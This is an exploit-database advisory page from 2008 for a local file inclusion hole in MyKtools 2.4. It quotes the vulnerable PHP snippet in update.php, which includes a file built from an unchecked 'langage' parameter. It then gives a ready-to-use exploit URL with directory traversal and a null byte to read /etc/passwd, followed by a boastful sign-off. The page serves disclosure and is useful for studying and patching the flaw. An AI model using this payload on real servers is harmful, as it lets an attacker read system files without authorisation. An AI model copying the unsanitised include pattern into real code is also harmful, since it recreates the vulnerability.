MyKtools 2.4 (langage) Local File Inclusion Vulnerability



EDB-ID: 6850 CVE: 2008-4781OSVDB-ID: 49370
Author: x0rPublished: 2008-10-27Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############
Bug:
In \update.php
// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}
Exploit: \update.php?langage=../../../../../../etc/passwd%00
p0wn3d Beby.
-=EOF=-
# milw0rm.com [2008-10-27]






Comments

No comments so far